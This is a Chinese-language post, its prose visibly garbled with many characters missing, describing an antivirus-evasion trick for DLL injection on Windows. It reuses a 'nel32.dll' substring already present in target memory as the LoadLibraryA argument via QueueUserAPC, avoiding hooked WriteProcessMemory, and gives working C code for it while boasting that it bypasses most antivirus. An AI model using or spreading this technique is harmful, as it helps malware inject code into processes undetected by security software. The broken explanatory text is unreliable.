目
數
殺軟都
hook NtWriteVirtualMemory
NtUserSetWindowsHookAW、NtUserSetWindowsHookE
防止代碼注入。
關于代碼注入Ring3層
主
有:
l 遠程線程CreateRemoteThread
l 消息鉤子SetWindowsHookEx
l Ring3 APC QueueUserApc
l 修改線程
文SetContextThread
其
第
種第三種需傳入個param,但求這個param必須
目標進程
存空間,
些比較笨重,直接目標進程VirtualAllocEx存,然
希望參數容
入這個存,使
WriteProcessMemory函數,而這個函數被hook,所以殺軟
以
容易攔截代碼注入行
。
仔細想想,殺軟這種防御失敗!原因個param,攻擊
完全沒有必做這么動作去目標進程存空間申
存并存,
思考否以不WriteProcessMemory函數呢?反
目就得
個合理param,并且這個param目標進程存空間即!
思考,原切這么容易啊,哈哈!樂半天~~~
舉個例子:假設這樣注入:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
想讓面param容個“xxx.dll”,就以,而且求這個param目標進程存空間
您想么?哈哈
答案:直接目標進程搜索個這樣字符串“nel32.dll”就以啦!因“kernel32.dll” 這樣字符串定存,那么“kernel32.dll” 不樣,那就隨便使“nel32.dll”,或“el32.dll”,都以啊!最往windows目錄面撂進入個nel32.dll,這樣注入部分殺軟都不能攔截!哈哈!
段程序,做個試驗,僅測試趨勢,完美繞過!其實殺軟稍測試。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//////////////////////////////////////////////////////////////////////////
//不目標進程存
//直接目標進程搜索出 nel32.dll 這樣字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//獲得該進程基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
printf("CreateToolhelp32Snapshot error!n");
return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
printf("Module32First error!n");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %sn",processName,me.szModule);
// 
得進程模塊基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08Xn",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %sn",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL指定進程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%dn", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
}